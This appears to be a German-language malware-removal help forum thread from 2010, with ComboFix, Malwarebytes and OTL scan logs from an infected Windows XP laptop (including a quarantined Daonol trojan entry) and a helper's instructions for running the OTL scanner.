2010-06-18 11:17 . 2010-06-18 11:17 388096 ----a-r- c:\dokumente und einstellungen\***\Anwendungsdaten\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe
2010-06-08 17:27 . 2009-12-07 22:42 -------- d-----w- c:\dokumente und einstellungen\***\Anwendungsdaten\GlobalMapper
2010-06-08 14:59 . 2008-08-26 22:38 -------- d-----w- c:\programme\Gemeinsame Dateien\Dienste
2010-06-08 14:57 . 2008-08-26 22:36 23504 ----a-w- c:\windows\system32\emptyregdb.dat
2010-06-08 14:56 . 2008-08-26 22:36 -------- d-----w- c:\programme\Windows Media Connect 2
2010-05-21 22:47 . 2009-12-03 00:30 -------- d-----w- c:\programme\xpdf-302pl4
2010-05-20 23:14 . 2010-05-20 23:14 -------- d-----w- c:\programme\satmap_v2.3.7
2010-05-19 20:48 . 2010-01-30 15:52 -------- d-----w- c:\programme\UnxUtils
2010-05-04 16:48 . 2008-06-18 08:36 841216 ----a-w- c:\windows\system32\wininet.dll
2010-05-04 16:48 . 2008-06-18 08:36 78336 ----a-w- c:\windows\system32\ieencode.dll
2010-05-04 16:48 . 2008-06-18 08:36 17408 ----a-w- c:\windows\system32\corpol.dll
2010-05-02 11:30 . 2008-06-18 08:35 1860480 ----a-w- c:\windows\system32\win32k.sys
2010-04-20 05:29 . 2008-04-14 05:50 285696 ----a-w- c:\windows\system32\atmfd.dll
2010-04-08 15:16 . 2010-04-16 01:00 1711232 ----a-w- c:\windows\system32\BootMan.exe
2010-04-07 19:08 . 2010-04-07 19:08 95872 ----a-w- c:\windows\system32\drivers\epfwtdir.sys
2010-04-07 19:07 . 2010-04-07 19:07 114984 ----a-w- c:\windows\system32\drivers\ehdrv.sys
2010-04-07 19:03 . 2010-04-07 19:03 139192 ----a-w- c:\windows\system32\drivers\eamon.sys
2010-03-30 22:16 . 2010-03-30 22:16 99176 ----a-w- c:\windows\system32\PresentationHostProxy.dll
2010-03-30 22:10 . 2010-03-30 22:10 295264 ----a-w- c:\windows\system32\PresentationHost.exe
2010-01-03 12:42 . 2009-06-12 00:09 0 -c--a-w- c:\programme\lastdir
2009-06-11 22:40 . 2009-06-11 22:13 14243 ----a-w- c:\programme\RenameFiles.log
2009-06-11 21:23 . 2009-06-11 21:23 315392 ----a-w- c:\programme\renamefiles_v2.42_de.exe
2007-11-06 11:22 . 2008-11-06 03:15 49236 ----a-w- c:\programme\fat32format.exe
2007-08-27 09:29 . 2008-10-08 23:06 64751 ----a-w- c:\programme\compare.exe
2007-01-05 10:56 . 2008-10-08 23:14 1296896 ----a-w- c:\programme\COMPAREIT.exe
2007-01-04 13:16 . 2010-03-28 21:54 401408 ----a-w- c:\programme\SmartDisk_FAT32_tool.exe
.
(((((((((((((((((((((((((((( Autostartpunkte der Registrierung ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt.
REGEDIT4
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SandboxieControl"="c:\programme\Sandboxie\SbieCtrl.exe" [2010-04-17 394984]
"LightScribe Control Panel"="c:\programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe" [2007-10-18 455968]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"PCTVOICE"="pctspk.exe" [2003-02-24 163840]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2003-12-14 155648]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2003-12-14 118784]
"SynTPLpr"="c:\programme\Synaptics\SynTP\SynTPLpr.exe" [2004-10-14 98394]
"SynTPEnh"="c:\programme\Synaptics\SynTP\SynTPEnh.exe" [2004-10-14 688218]
"IntelZeroConfig"="c:\programme\Intel\Wireless\bin\ZCfgSvc.exe" [2007-11-01 995328]
"IntelWireless"="c:\programme\Intel\Wireless\Bin\ifrmewrk.exe" [2007-11-01 1101824]
"Panasonic Hotkey Manager"="c:\programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE" [2007-08-23 976264]
"WSwitch"="c:\programme\Panasonic\WSwitch\WSwitch.exe" [2007-12-19 734568]
"PCinfo"="c:\programme\Panasonic\PCINFO\SetDiag.exe" [2004-01-28 45056]
"NeroFilterCheck"="c:\programme\Gemeinsame Dateien\Ahead\Lib\NeroCheck.exe" [2007-03-01 153136]
"SecurDisc"="c:\programme\Nero\Nero 7\InCD\NBHGui.exe" [2007-06-01 1629744]
"InCD"="c:\programme\Nero\Nero 7\InCD\InCD.exe" [2007-06-01 1057328]
"VirtualCloneDrive"="c:\programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe" [2008-06-29 52168]
"HPDJ Taskbar Utility"="c:\windows\system32\spool\drivers\w32x86\3\hpztsb04.exe" [2001-12-11 196608]
"Adobe Reader Speed Launcher"="c:\programme\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2010-04-04 36272]
"Adobe ARM"="c:\programme\Gemeinsame Dateien\Adobe\ARM\1.0\AdobeARM.exe" [2010-03-24 952768]
"egui"="c:\programme\ESET\ESET NOD32 Antivirus\egui.exe" [2010-04-07 2145000]
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"ShowDeskFix"="shell32" [X]
"nltide_3"="advpack.dll" [2010-05-04 124928]
"IE7"="advpack.dll" [2010-05-04 124928]
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"midi9"=c:\dokume~1\***\LOKALE~1\Temp\org.bak 2yAPFDOFNF
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ autocheck autochk *\0sprestrt
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"%windir%\\system32\\sessmgr.exe"=
"c:\\Programme\\Java\\jre1.6.0_06\\bin\\java.exe"=
"c:\\Programme\\eMule0.49b\\emule.exe"=
"c:\\Programme\\Opera\\opera.exe"=
"c:\\Programme\\Java\\jre1.6.0_06\\launch4j-tmp\\JDownloader.exe"=
"c:\\WINDOWS\\system32\\java.exe"=
"c:\\Programme\\WinSCP\\WinSCP.exe"=
R0 hotcore3;hc3ServiceName;c:\windows\system32\drivers\hotcore3.sys [18.03.2010 04:19 40560]
R1 ehdrv;ehdrv;c:\windows\system32\drivers\ehdrv.sys [07.04.2010 21:07 114984]
R1 epfwtdir;epfwtdir;c:\windows\system32\drivers\epfwtdir.sys [07.04.2010 21:08 95872]
R2 brecal;Panasonic Battery Recalibration Driver;c:\programme\Panasonic\BRECAL\Brecal.sys [28.08.2008 15:10 7168]
R2 ekrn;ESET Service;c:\programme\ESET\ESET NOD32 Antivirus\ekrn.exe [07.04.2010 21:07 810120]
R2 pcinfo;Panasonic PC Info. Viewer Driver;c:\programme\Panasonic\PCINFO\PCINFO.sys [28.08.2008 15:27 7168]
R2 WMDrive;WMDrive;c:\windows\system32\drivers\WMDrive.sys [20.10.2008 13:24 88832]
R3 AVMWAN;AVM NDIS WAN CAPI-Treiber;c:\windows\system32\drivers\avmwan.sys [15.01.2009 19:23 37568]
R3 NewMisc;Panasonic Misc Driver;c:\windows\system32\drivers\newmisc.sys [28.08.2008 14:24 50440]
S3 epmntdrv;epmntdrv;c:\windows\system32\epmntdrv.sys [16.04.2010 03:00 13192]
S3 EuGdiDrv;EuGdiDrv;c:\windows\system32\EuGdiDrv.sys [16.04.2010 03:00 8456]
S3 fpcmbase;AVM ISDN-Controller FRITZ!Card PCMCIA;c:\windows\system32\drivers\fpcmbase.sys [15.01.2009 19:22 441728]
S3 MEMSWEEP2;MEMSWEEP2;\??\c:\windows\system32\4.tmp --> c:\windows\system32\4.tmp [?]
S3 UltraCrypt;UltraCrypt;\??\c:\programme\UltraLeecher\UltraCrypt.sys --> c:\programme\UltraLeecher\UltraCrypt.sys [?]
S3 WinRM;Windows-Remoteverwaltung (WS-Verwaltung);c:\windows\System32\svchost.exe -k WinRM [14.04.2008 07:53 14336]
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
WINRM REG_MULTI_SZ WINRM
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{10880D85-AAD9-4558-ABDC-2AB1552D831F}]
2007-10-18 13:25 451872 ----a-w- c:\programme\Gemeinsame Dateien\LightScribe\LSRunOnce.exe
.
.
------- Zusätzlicher Suchlauf -------
.
uStart Page = hxxp://www.google.de/
TCP: {D9AE09D2-9DAE-46C5-93FE-0DC1FCBB848E} = 217.0.43.161 217.0.43.177
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
HKU-Default-RunOnce-tscuninstall - c:\windows\system32\tscupgrd.exe
AddRemove-hp deskjet 930c series - c:\programme\hp deskjet 930c series\hpfiui.exe
**************************************************************************
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, hxxp://www.gmer.net
Rootkit scan 2010-06-25 23:58
Windows 5.1.2600 Service Pack 3 NTFS
Scanne versteckte Prozesse...
Scanne versteckte Autostarteinträge...
Scanne versteckte Dateien...
Scan erfolgreich abgeschlossen
versteckte Dateien: 0
**************************************************************************
[HKEY_LOCAL_MACHINE\System\ControlSet003\Services\MEMSWEEP2]
"ImagePath"="\??\c:\windows\system32\4.tmp"
.
--------------------- Durch laufende Prozesse gestartete DLLs ---------------------
- - - - - - - > 'winlogon.exe'(784)
c:\windows\system32\netprovcredman.dll
- - - - - - - > 'explorer.exe'(732)
c:\programme\Windows Media Player\wmpband.dll
c:\windows\system32\msi.dll
c:\windows\system32\wpdshserviceobj.dll
c:\programme\WinSCP\DragExt.dll
c:\windows\system32\portabledevicetypes.dll
c:\windows\system32\portabledeviceapi.dll
.
------------------------ Weitere laufende Prozesse ------------------------
.
c:\programme\Intel\Wireless\Bin\S24EvMon.exe
c:\programme\Intel\Wireless\Bin\EvtEng.exe
c:\programme\Nero\Nero 7\InCD\InCDsrv.exe
c:\programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe
c:\programme\Intel\Wireless\Bin\RegSrvc.exe
c:\programme\Sandboxie\SbieSvc.exe
c:\windows\system32\pctspk.exe
.
**************************************************************************
.
Zeit der Fertigstellung: 2010-06-26 00:05:26 - PC wurde neu gestartet
ComboFix-quarantined-files.txt 2010-06-25 22:05
Vor Suchlauf: 8.527.527.936 Bytes frei
Nach Suchlauf: 8.848.887.808 Bytes frei
WindowsXP-KB310994-SP2-Pro-BootDisk-DEU.exe
[boot loader]
timeout=2
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
- - End Of File - - 914E63082233DBCC1FC83442D2E4C5E2
Code:
ATTFilter C:\Qoobox\Quarantine\C\DOKUME~1\***\LOKALE~1\Temp\org.bak.vir - Variante von Win32/Daonol.CY Trojaner - Gesäubert durch Löschen - in Quarantäne kopiert [1]
|
|
26.06.2010, 10:07
| #4 |
| /// Malware-holic | Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt ich sehe du hast Malwarebytes genutzt? poste bitte mal das log zu finden unter berichte. |
|
26.06.2010, 11:49
| #5 |
| | Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt Sieht auch gut aus: Malwarebytes geht jetzt Code:
ATTFilter Malwarebytes' Anti-Malware 1.46
www.malwarebytes.org
Datenbank Version: 4243
Windows 5.1.2600 Service Pack 3
Internet Explorer 7.0.5730.13
26.06.2010 12:17:43
mbam-log-2010-06-26 (12-17-43).txt
Art des Suchlaufs: Vollständiger Suchlauf (C:\|D:\|)
Durchsuchte Objekte: 282857
Laufzeit: 49 Minute(n), 6 Sekunde(n)
Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschlüssel: 0
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 0
Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)
Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)
Infizierte Registrierungsschlüssel:
(Keine bösartigen Objekte gefunden)
Infizierte Registrierungswerte:
(Keine bösartigen Objekte gefunden)
Infizierte Dateiobjekte der Registrierung:
(Keine bösartigen Objekte gefunden)
Infizierte Verzeichnisse:
(Keine bösartigen Objekte gefunden)
Infizierte Dateien:
(Keine bösartigen Objekte gefunden)
|
|
03.07.2010, 00:28
| #6 |
| /// Malware-holic | Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt ootl: Systemscan mit OTL download otl: http://filepony.de/download-otl/ Doppelklick auf die OTL.exe (user von Windows 7 und Vista: Rechtsklick als Administrator ausführen) 1. Oben findest Du ein Kästchen mit Output. Wähle bitte Minimal Output 2. Hake an "scan all users" 3. Unter "Extra Registry wähle: "Use Safelist" "LOP Check" "Purity Check" 4. Kopiere in die Textbox: netsvcs msconfig safebootminimal safebootnetwork activex drivers32 %ALLUSERSPROFILE%\Application Data\*. %ALLUSERSPROFILE%\Application Data\*.exe /s %APPDATA%\*. %APPDATA%\*.exe /s %SYSTEMDRIVE%\*.exe /md5start userinit.exe eventlog.dll scecli.dll netlogon.dll cngaudit.dll ws2ifsl.sys sceclt.dll ntelogon.dll logevent.dll iaStor.sys nvstor.sys atapi.sys IdeChnDr.sys viasraid.sys AGP440.sys vaxscsi.sys nvatabus.sys viamraid.sys nvata.sys nvgts.sys iastorv.sys ViPrt.sys eNetHook.dll ahcix86.sys KR10N.sys nvstor32.sys ahcix86s.sys /md5stop %systemroot%\system32\drivers\*.sys /lockedfiles %systemroot%\System32\config\*.sav %systemroot%\*. /mp /s %systemroot%\system32\*.dll /lockedfiles CREATERESTOREPOINT 5. Klicke "Scan" 6. 2 reporte werden erstellt: OTL.Txt Extras.Txt poste beide bitte |
|
03.07.2010, 19:22
| #7 |
| | Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt Hallo, weil die Ursachen schon solange zurückliegen, habe ich die Zeit auf 60 Tage gesetzt: OTL.txt Code:
ATTFilter OTL logfile created on: 03.07.2010 17:21:09 - Run 3 OTL by OldTimer - Version 3.2.7.0 Folder = C:\Dokumente und Einstellungen\***\Desktop Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation Internet Explorer (Version = 7.0.5730.13) Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy 1.014,00 Mb Total Physical Memory | 656,00 Mb Available Physical Memory | 65,00% Memory free 2,00 Gb Paging File | 2,00 Gb Available in Paging File | 87,00% Paging File free Paging file location(s): c:\pagefile.sys 1524 3048 [binary data] %SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Programme Drive C: | 64,00 Gb Total Space | 29,99 Gb Free Space | 46,85% Space Free | Partition Type: NTFS Drive D: | 85,02 Gb Total Space | 54,79 Gb Free Space | 64,44% Space Free | Partition Type: FAT32 E: Drive not present or media not loaded F: Drive not present or media not loaded G: Drive not present or media not loaded H: Drive not present or media not loaded I: Drive not present or media not loaded Computer Name: TOUGHBOOK Current User Name: *** Logged in as Administrator. Current Boot Mode: Normal Scan Mode: All users Company Name Whitelist: Off Skip Microsoft Files: Off File Age = 60 Days Output = Minimal ========== Processes (SafeList) ========== PRC - C:\Dokumente und Einstellungen\***\Desktop\OTL.exe (OldTimer Tools) PRC - C:\Programme\Secunia\PSI\psi.exe (Secunia) PRC - C:\Programme\Sandboxie\SbieCtrl.exe (tzuk) PRC - C:\Programme\Sandboxie\SbieSvc.exe (tzuk) PRC - C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe (ESET) PRC - C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe (ESET) PRC - C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe (Elaborate Bytes AG) PRC - C:\WINDOWS\explorer.exe (Microsoft Corporation) PRC - C:\Programme\Panasonic\WSwitch\WSwitch.exe (Matsushita Electric Industrial Co., Ltd.) PRC - C:\Programme\Intel\Wireless\Bin\EvtEng.exe (Intel Corporation) PRC - C:\Programme\Intel\Wireless\Bin\ZCfgSvc.exe (Intel Corporation) PRC - C:\Programme\Intel\Wireless\Bin\iFrmewrk.exe (Intel Corporation) PRC - C:\Programme\Intel\Wireless\Bin\S24EvMon.exe (Intel Corporation ) PRC - C:\Programme\Intel\Wireless\Bin\RegSrvc.exe (Intel Corporation) PRC - C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe (Hewlett-Packard Company) PRC - C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe (Hewlett-Packard Company) PRC - C:\Programme\Panasonic\Hotkey Appendix\hkeyapp.exe (Matsushita Electric Industrial Co., Ltd.) PRC - C:\Programme\Nero\Nero 7\InCD\NBHGui.exe (Nero AG) PRC - C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe (Nero AG) PRC - C:\Programme\Nero\Nero 7\InCD\InCD.exe (Nero AG) PRC - C:\Programme\Synaptics\SynTP\SynTPLpr.exe (Synaptics, Inc.) PRC - C:\WINDOWS\system32\pctspk.exe () PRC - C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe (HP) ========== Modules (SafeList) ========== MOD - C:\Dokumente und Einstellungen\***\Desktop\OTL.exe (OldTimer Tools) MOD - C:\WINDOWS\system32\msscript.ocx (Microsoft Corporation) MOD - C:\WINDOWS\system32\SynTPFcs.dll (Synaptics, Inc.) ========== Win32 Services (SafeList) ========== SRV - (SbieSvc) -- C:\Programme\Sandboxie\SbieSvc.exe (tzuk) SRV - (EhttpSrv) -- C:\Programme\ESET\ESET NOD32 Antivirus\EHttpSrv.exe (ESET) SRV - (ekrn) -- C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe (ESET) SRV - (EvtEng) Intel(R) -- C:\Programme\Intel\Wireless\Bin\EvtEng.exe (Intel Corporation) SRV - (S24EventMonitor) Intel(R) -- C:\Programme\Intel\Wireless\Bin\S24EvMon.exe (Intel Corporation ) SRV - (RegSrvc) Intel(R) -- C:\Programme\Intel\Wireless\Bin\RegSrvc.exe (Intel Corporation) SRV - (LightScribeService) -- C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe (Hewlett-Packard Company) SRV - (NMIndexingService) -- C:\Programme\Gemeinsame Dateien\Ahead\Lib\NMIndexingService.exe (Nero AG) SRV - (InCDsrv) -- C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe (Nero AG) ========== Driver Services (SafeList) ========== DRV - (PSI) -- C:\WINDOWS\system32\drivers\psi_mf.sys (Secunia) DRV - (SbieDrv) -- C:\Programme\Sandboxie\SbieDrv.sys (tzuk) DRV - (epfwtdir) -- C:\WINDOWS\system32\drivers\epfwtdir.sys (ESET) DRV - (ehdrv) -- C:\WINDOWS\system32\drivers\ehdrv.sys (ESET) DRV - (eamon) -- C:\WINDOWS\system32\drivers\eamon.sys (ESET) DRV - (epmntdrv) -- C:\WINDOWS\system32\epmntdrv.sys () DRV - (EuGdiDrv) -- C:\WINDOWS\system32\EuGdiDrv.sys () DRV - (Uim_IM) -- C:\WINDOWS\system32\drivers\Uim_IM.sys (Paragon) DRV - (UimBus) -- C:\WINDOWS\system32\drivers\UimBus.sys (Windows (R) 2000 DDK provider) DRV - (hotcore3) -- C:\WINDOWS\system32\DRIVERS\hotcore3.sys (Paragon Software Group) DRV - (WMDrive) -- C:\WINDOWS\system32\drivers\WMDrive.sys () DRV - (VClone) -- C:\WINDOWS\system32\drivers\VClone.sys (Elaborate Bytes AG) DRV - (ElbyCDIO) -- C:\WINDOWS\system32\drivers\ElbyCDIO.sys (Elaborate Bytes AG) DRV - (Aspi32) -- C:\WINDOWS\system32\drivers\aspi32.sys (Adaptec) DRV - (NewMisc) -- C:\WINDOWS\system32\drivers\newmisc.sys (Matsushita Electric Industrial Co., Ltd.) DRV - (s24trans) -- C:\WINDOWS\system32\drivers\s24trans.sys (Intel Corporation) DRV - (w29n51) Intel(R) -- C:\WINDOWS\system32\drivers\w29n51.sys (Intel® Corporation) DRV - (incdrm) -- C:\WINDOWS\system32\drivers\InCDRm.sys (Nero AG) DRV - (InCDPass) -- C:\WINDOWS\system32\drivers\InCDPass.sys (Nero AG) DRV - (InCDfs) -- C:\WINDOWS\system32\drivers\InCDfs.sys (Nero AG) DRV - (SynTP) -- C:\WINDOWS\system32\drivers\SynTP.sys (Synaptics, Inc.) DRV - (pcinfo) -- C:\Programme\Panasonic\PCINFO\PCINFO.sys (Matsushita Electric Industrial Co., Ltd.) DRV - (brecal) -- C:\Programme\Panasonic\BRECAL\Brecal.sys (Matsushita Electric Industrial Co., Ltd.) DRV - (Vmodem) -- C:\WINDOWS\system32\DRIVERS\vmodem.sys (PCTEL, INC.) DRV - (Vpctcom) -- C:\WINDOWS\system32\DRIVERS\vpctcom.sys (PCtel, Inc.) DRV - (Ptserial) -- C:\WINDOWS\system32\drivers\ptserial.sys (PCTEL, INC.) DRV - (Vvoice) -- C:\WINDOWS\system32\DRIVERS\vvoice.sys (PCtel, Inc.) DRV - (RTL8023) -- C:\WINDOWS\system32\drivers\Rtlnic51.sys (Realtek Semiconductor Corporation ) DRV - (STAC97) Audio Driver (WDM) -- C:\WINDOWS\system32\drivers\stac97.sys (SigmaTel, Inc.) DRV - (HOTKEY) -- C:\WINDOWS\system32\drivers\HOTKEY.SYS (Matsushita Electric Industrial Co.,Ltd.) DRV - (fpcmbase) -- C:\WINDOWS\system32\drivers\fpcmbase.sys (AVM GmbH) DRV - (AVMWAN) -- C:\WINDOWS\system32\drivers\avmwan.sys (AVM GmbH) ========== Standard Registry (SafeList) ========== ========== Internet Explorer ========== IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com/ IE - HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-21-1957994488-1580818891-842925246-1004\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/ IE - HKU\S-1-5-21-1957994488-1580818891-842925246-1004\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 FF - HKLM\software\mozilla\Thunderbird\Extensions\\eplgTb@eset.com: C:\Programme\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2010.06.14 13:51:58 | 000,000,000 | ---D | M] [2010.01.31 18:38:38 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\nahd6ha2.default\extensions [2010.01.31 18:38:44 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\nahd6ha2.default\extensions\yasearch@yandex.ru [2010.01.31 18:38:39 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\nahd6ha2.default\extensions\yasearch@yandex.ru\chrome\skin\extensions-hacks O1 HOSTS File: ([2010.06.25 23:58:23 | 000,000,027 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts O1 - Hosts: 127.0.0.1 localhost O2 - BHO: (Adobe PDF Link Helper) - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated) O2 - BHO: (SSVHelper Class) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll (Sun Microsystems, Inc.) O4 - HKLM..\Run: [Adobe ARM] C:\Programme\Gemeinsame Dateien\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems Incorporated) O4 - HKLM..\Run: [egui] C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe (ESET) O4 - HKLM..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe (HP) O4 - HKLM..\Run: [InCD] C:\Programme\Nero\Nero 7\InCD\InCD.exe (Nero AG) O4 - HKLM..\Run: [IntelWireless] C:\Programme\Intel\Wireless\Bin\ifrmewrk.exe (Intel Corporation) O4 - HKLM..\Run: [IntelZeroConfig] C:\Programme\Intel\Wireless\bin\ZCfgSvc.exe (Intel Corporation) O4 - HKLM..\Run: [NeroFilterCheck] C:\Programme\Gemeinsame Dateien\Ahead\Lib\NeroCheck.exe (Nero AG) O4 - HKLM..\Run: [Panasonic Hotkey Manager] C:\Programme\Panasonic\Hotkey Appendix\hkeyapp.exe (Matsushita Electric Industrial Co., Ltd.) O4 - HKLM..\Run: [PCinfo] C:\Programme\Panasonic\PCINFO\SetDiag.exe (Matsushita Electric Industrial Co.,Ltd.) O4 - HKLM..\Run: [PCTVOICE] C:\WINDOWS\System32\pctspk.exe () O4 - HKLM..\Run: [SecurDisc] C:\Programme\Nero\Nero 7\InCD\NBHGui.exe (Nero AG) O4 - HKLM..\Run: [SynTPLpr] C:\Programme\Synaptics\SynTP\SynTPLpr.exe (Synaptics, Inc.) O4 - HKLM..\Run: [VirtualCloneDrive] C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe (Elaborate Bytes AG) O4 - HKLM..\Run: [WSwitch] C:\Programme\Panasonic\WSwitch\WSwitch.exe (Matsushita Electric Industrial Co., Ltd.) O4 - HKU\S-1-5-21-1957994488-1580818891-842925246-1004..\Run: [LightScribe Control Panel] C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe (Hewlett-Packard Company) O4 - HKU\S-1-5-21-1957994488-1580818891-842925246-1004..\Run: [SandboxieControl] C:\Programme\Sandboxie\SbieCtrl.exe (tzuk) O4 - HKU\.DEFAULT..\RunOnce: [ShowDeskFix] File not found O4 - HKU\S-1-5-18..\RunOnce: [ShowDeskFix] File not found O4 - Startup: C:\Dokumente und Einstellungen\***\Startmenü\Programme\Autostart\Secunia PSI.lnk = C:\Programme\Secunia\PSI\psi.exe (Secunia) O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Low Rights present O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0 O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel present O7 - HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323 O7 - HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863 O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Control Panel present O7 - HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323 O7 - HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863 O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Control Panel present O7 - HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 149 O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Control Panel present O7 - HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145 O7 - HKU\S-1-5-21-1957994488-1580818891-842925246-1004\Software\Policies\Microsoft\Internet Explorer\Control Panel present O7 - HKU\S-1-5-21-1957994488-1580818891-842925246-1004\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323 O7 - HKU\S-1-5-21-1957994488-1580818891-842925246-1004\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863 O7 - HKU\S-1-5-21-1957994488-1580818891-842925246-1004\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0 O9 - Extra 'Tools' menuitem : Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_06\bin\npjpi160_06.dll (Sun Microsystems, Inc.) O9 - Extra Button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Programme\WinHTTrack\WinHTTrackIEBar.dll () O9 - Extra 'Tools' menuitem : Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Programme\WinHTTrack\WinHTTrackIEBar.dll () O16 - DPF: {31435657-9980-0010-8000-00AA00389B71} 